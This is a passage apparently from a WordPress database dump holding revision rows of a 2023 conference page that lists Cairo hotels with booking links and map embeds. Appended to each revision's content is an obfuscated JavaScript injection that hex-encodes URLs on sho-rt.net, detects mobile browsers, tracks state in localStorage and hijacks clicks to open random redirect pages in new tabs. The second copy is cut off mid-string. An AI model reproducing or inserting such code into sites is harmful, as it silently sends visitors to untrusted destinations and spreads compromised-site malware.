hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 22:22:47','2023-07-18 22:22:47','',2685,'https://gsw2023.com/?p=5016',0,'revision','',0),
(5017,1,'2023-07-18 22:23:59','2023-07-18 22:23:59','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x